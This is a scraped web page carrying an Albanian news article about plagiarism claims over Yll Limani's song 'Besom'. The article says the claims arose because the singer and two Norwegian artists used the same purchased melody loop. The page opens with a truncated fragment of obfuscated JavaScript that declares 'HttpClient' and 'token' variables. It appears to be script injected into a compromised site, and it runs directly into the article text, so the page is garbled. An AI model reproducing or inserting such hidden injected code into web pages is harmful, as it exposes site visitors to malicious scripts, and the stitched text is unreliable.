;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

A e vodhi Yll Limani këngën ‘Besom’?

By

Gjatë kësaj jave që po e lëmë pas, Yll Limani publikoi projektin e ri të titulluar ‘Besom’ në bashkëpunim me Dj Dagz dhe Dj PM.

Ky krijim muzikor në fillim u prit mirë por ajo që pasoi zbehu pak suksesin.

Në media dhe gjithandej në rrjete sociale u tha se kënga është e vjedhur nga dy këngëtarët norvegjez Hkeem dhe Temur.

Kjo bëri që të vërshojnë komentet edhe në profilin e norvegjezit i cili nuk tha ndonjë fjalë,për një arsye të fortë.

Prive, nga disa hulumtime ka arritur të kuptoj se në fakt nuk bëhet fjalë për vjedhje por për një vijë melodike të njejtë e cila mund të blehet kundrejt një çmimi të caktuar në faqe online me shifra që variojnë nga 70 dollarë e lartë.

Platforma ku bëhet shitja e vijave melodike nuk garanton përdorim të vetëm por qasje nga secili që paguan shumën e caktuar dhe kjo është arsyeja që ka ndodhur ky keqkuptim.

E rëndësishme është që si në Kosovë apo Norvegji, produkti final i artistëve në fjalë po pëlqehet! /Prive.al

 

Artikuj të ngjashëm